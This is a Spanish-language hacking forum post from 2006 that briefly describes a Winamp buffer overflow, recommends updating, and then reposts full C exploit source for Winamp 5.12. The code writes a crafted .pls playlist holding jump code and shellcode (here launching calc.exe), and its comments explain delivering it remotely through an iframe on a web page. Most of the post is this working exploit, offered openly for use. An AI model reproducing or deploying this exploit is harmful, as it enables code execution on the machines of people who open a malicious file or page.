hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
21 de Agosto de 2008, 06:30:16
Noticias: ¿Quieres aprender a programar en C/C++?
Para ver este enlace Registrate o Inicia Sesion
> lee aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Exploit para desbordamiento de memoria en winamp 5		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Exploit para desbordamiento de memoria en winamp 5  (Leído 304 veces)
CiberPunk
NZ2
**
Desconectado Desconectado

Mensajes: 341


Asm & C/C++


Ver Perfil
« : 01 de Julio de 2006, 03:38:35 »
Bueno como todos ya conocen los desbordamiento s de memoria son lo mismo que llamar overflows.

asi que este exploit nos sirve para cualquier version 5

un poco de detalles antes que nada:
Se ha identificado una vulnerabilidad en Nullsoft Winamp que puede ser aprovechada por atacantes remotos para hacerse con un sistema vulnerable.

Winamp es seguramente el reproductor de archivos multimedia más famoso para plataformas Windows. Entre sus cualidades está el soportar múltiples formatos, ser ligero, aceptar infinidad de plug-ins y la posibilidad de descarga de versiones gratuitas.

El fallo se debe a un desbordamiento de memoria intermedia en la librería in_midi.dll, que no maneja adecuadamente cabeceras especialmente formadas de archivos MIDI. Esto podría ser aprovechado por atacantes para hacer que la aplicación deje de responder y posiblemente ejecutar código arbitrario. Para ello un usuario sólo tendría que
visitar una página especialmente manipulada que intentase abrir un archivo en formato .mid o ejecutarlo directamente si el atacante lo envía de alguna forma.

Muchos usuarios no tienen conciencia de la importancia de actualizar todo el software que puedan tener instalado en su sistema, independientem ente del sistema operativo. Winamp, cada cierto tiempo, sufre de un problema de desbordamiento de memoria en algún formato y puede convertirse en un origen de ataques al sistema tan peligroso como cualquier otro. En la mayoría de las ocasiones, sólo necesita de la ejecución de un archivo con la aplicación vulnerable para ser aprovechado. Su popularidad lo convierte en un jugoso objetivo para atacantes.

Bueno la solucion de esto es actualizar el winamp a 5.22
si alguien ya lo tiene que los ponga ya.

Lo interesante el codigo del Exploit:

*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web:
Para ver este enlace Registrate o Inicia Sesion  &&
Para ver este enlace Registrate o Inicia Sesion
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
*
Para ver este enlace Registrate o Inicia Sesion
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x045D
#define PLAYLIST_FILE   "crafted.pls"

char szPlayListHead er1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHead er2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

// Harmless Calc.exe
char shellcode[] =
        "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
        "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
   "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
   "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
   "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
        "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
   "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
   "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
   "\x61\xdd\x0e\x4d";


int main(int argc,char *argv[])
{
        printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
        printf("\nBug discovered & exploit coded by ATmaCA");
        printf("\nWeb:
Para ver este enlace Registrate o Inicia Sesion  &&
Para ver este enlace Registrate o Inicia Sesion");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");

        FILE *File;
        char *pszBuffer;

        if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memset(pszBuffer,0x90,BUF_LEN);
        memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHead er1)-1);
        memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
        memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
        memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHead er2)-1);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("\n\n"  PLAYLIST_FILE  " has been created in the current directory.\n");
        return 1;
}

// milw0rm.com [2006-01-29]

Como pueden ver este exploit lo saque de
Para ver este enlace Registrate o Inicia Sesion
www.milworm.co m

Saludos
En línea
if stdio.h then printf(" Hello World\n");
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online